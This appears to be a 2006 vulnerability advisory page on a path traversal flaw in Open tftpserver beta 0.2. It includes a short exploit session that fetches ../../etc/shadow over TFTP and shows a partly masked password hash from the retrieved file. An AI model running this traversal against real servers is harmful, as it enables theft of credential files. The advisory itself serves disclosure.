Open tftpserver path traversal vulnerability

2018.10.02

Larry W. Cashdollar (US)

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

Title: Open tftpserver path traversal vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2006-03-24
Download Site: http://sourceforge.net/projects/tftp-server/
Vendor: achaldhir
Vendor Notified: 2006-03-24
Vendor Contact: http://sourceforge.net/u/achaldhir/profile/
Advisory: http://www.vapid.dhs.org/advisories/tftpserver_dot_dot_vulnerability.html
Description: MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available.
Vulnerability:
tftpserver beta 0.2 is vulnerable to the ../ bug because it does not sanitize user input.
Export: JSON TEXT XML
Exploit Code:
root@pangea:/home/done/tftpserver# tftp 192.168.0.26
 
tftp> get ../../etc/shadow
 
Received 652 bytes in 0.0 seconds
 
tftp> quit
 
root@debian:/home/done/tftpserver# head shadow
 
root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7:::

References:

http://www.vapidlabs.com/advisory.php?v=46

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Open tftpserver path traversal vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.